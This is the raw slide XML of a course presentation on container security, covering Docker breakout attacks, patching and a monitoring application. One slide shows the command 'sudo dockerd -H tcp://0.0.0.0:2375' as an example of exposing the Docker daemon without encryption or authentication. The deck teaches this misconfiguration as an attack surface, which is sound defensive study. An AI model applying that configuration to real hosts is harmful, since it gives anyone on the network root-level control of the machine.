          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275890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39B9-CF09-6B7E-4967-F9BC95219E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="1"/>
            <a:r>
              <a:rPr lang="en-SA" sz="4400"/>
              <a:t>Containers Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0215DC6C-E028-4A88-D4C4-F150502D5995}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
            <a:endParaRPr lang="ar-SA" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:highlight>
                <a:srgbClr val="E1E2E6"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Direct access to the Docker daemon through an API </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>No e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ncryption or authentication!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:highlight>
                <a:srgbClr val="E1E2E6"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dockerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="E1E2E6"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://0.0.0.0:2375</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A17E0B-0DE7-79CA-0168-652A25959661}"/>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CE531930-911B-D54D-97E7-92ECE0E607D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15427317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954589-DBC9-F5B8-A1A9-A46811A65EC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Monitoring</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C11A990-9DE4-4ED0-3B40-E922A560E29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Aptos"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720AA724-2F17-D9E7-1585-29921A3F86B5}"/>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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2CA3002-FA70-086B-C206-8E47AB22A156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="836505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0629-FF05-7C3F-7B5F-C7CB3EA50FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737616" y="321310"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C85E934-78A5-AEC2-7723-31D1B0B2F90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9473EAE-CD78-1556-4F23-6B0E72853E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6356350"/>
            <a:ext cx="4114800" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>INSE 6130 OPERATING SYSTEM SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3650680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8EEE-F9FA-4192-819F-7FBC95A0FD9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Confirm the Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D03215-6965-EB9A-DE40-C6E9403DBC69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{688AA6D5-9CF2-5E47-7EFA-AFBB4F9F6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00203"/>
            <a:ext cx="7924800" cy="2641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47D1B97-623C-5FF2-7478-9EBF22BE9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424364"/>
            <a:ext cx="7924800" cy="111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3D1AEC-5326-717D-5DF0-3A89C807035C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735724" y="2480441"/>
            <a:ext cx="9239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SA"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35807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81</Slides>
  <Notes>30</Notes>
  <HiddenSlides>44</HiddenSlide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Implementing Recent Attacks and a Security Application on Containers</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Container Breakout</vt:lpstr>
      <vt:lpstr>Containers Attacks</vt:lpstr>
      <vt:lpstr>Confirm the Vulnerability</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Container Breakout</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Container Breakout</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container Breakout</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container Breakout</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Container Breakout</vt:lpstr>
      <vt:lpstr>Leaky Vessels</vt:lpstr>
      <vt:lpstr>runC</vt:lpstr>
      <vt:lpstr>runC leaked fds container breakout </vt:lpstr>
      <vt:lpstr>runC leaked fds container breakout </vt:lpstr>
      <vt:lpstr>runC leaked fds container breakout </vt:lpstr>
      <vt:lpstr>runC leaked fds container breakout </vt:lpstr>
      <vt:lpstr>Attack Scenario</vt:lpstr>
      <vt:lpstr>Attack Scenario</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Patching</vt:lpstr>
      <vt:lpstr>Docker socket misconfigurations</vt:lpstr>
      <vt:lpstr>Docker socket misconfigurations</vt:lpstr>
      <vt:lpstr>Docker socket misconfigurations</vt:lpstr>
      <vt:lpstr>Patching</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Privilege escalation using Volume Mount</vt:lpstr>
      <vt:lpstr>Patching</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Container escape using the exposed socket</vt:lpstr>
      <vt:lpstr>Patching</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Container attack using privileged flag</vt:lpstr>
      <vt:lpstr>Patching</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Docker build code execution</vt:lpstr>
      <vt:lpstr>Patching</vt:lpstr>
      <vt:lpstr>runC Escape Vulnerability</vt:lpstr>
      <vt:lpstr>runC Escape Vulnerability</vt:lpstr>
      <vt:lpstr>runC Escape Vulnerability</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Monitoring</vt:lpstr>
      <vt:lpstr>Monitoring</vt:lpstr>
      <vt:lpstr>Security Monitoring Application: Key Ideas</vt:lpstr>
      <vt:lpstr>Monitoring</vt:lpstr>
      <vt:lpstr>Security Monitoring Application: Architecture Overview</vt:lpstr>
      <vt:lpstr>Monitoring</vt:lpstr>
      <vt:lpstr>Examples of Analyzing Breakout Vulnerabilities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Recent Attacks and a Security Application on Containers</dc:title>
  <dc:creator>Tariq Hawis</dc:creator>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-08T10:21:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-10T03:37:34Z</dcterms:modified>
</cp:coreProperties>
</file>